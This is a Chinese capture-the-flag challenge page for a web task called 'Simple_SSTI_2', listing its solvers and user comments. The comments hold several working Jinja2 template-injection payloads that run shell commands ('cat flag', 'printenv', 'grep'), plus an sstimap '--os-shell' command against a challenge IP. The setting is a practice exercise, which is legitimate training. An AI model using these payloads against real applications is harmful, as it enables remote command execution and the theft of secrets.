Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16156
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
15856786402 攻破了该题 10小时前
Alune 攻破了该题 11小时前
365days 攻破了该题 13小时前
nusse 攻破了该题 14小时前
AD钙 攻破了该题 1天前
syhxxxzxc 攻破了该题 2天前
qingqiu 攻破了该题 5天前
zrc2682 攻破了该题 6天前
18371411097 攻破了该题 6天前
GG200311 攻破了该题 7天前
a543589796 攻破了该题 7天前
soha 攻破了该题 8天前
13788000065 攻破了该题 8天前
zhangjieluo1994 攻破了该题 11天前
ucole 攻破了该题 11天前
13391561145 攻破了该题 12天前
脆啵啵果冻 攻破了该题 13天前
1175803054 攻破了该题 13天前
18878033685 攻破了该题 15天前
评论
liutong27 2月前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 5月前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 7月前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 7月前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 11月前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 1年前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 1年前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}
不会写代码的菜鸟 1年前
举报
大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀
qingchuan 1年前
举报
因为没有import os,os是未定义的
q1152874733 1年前
举报
http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}
Royic 1年前
举报
/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}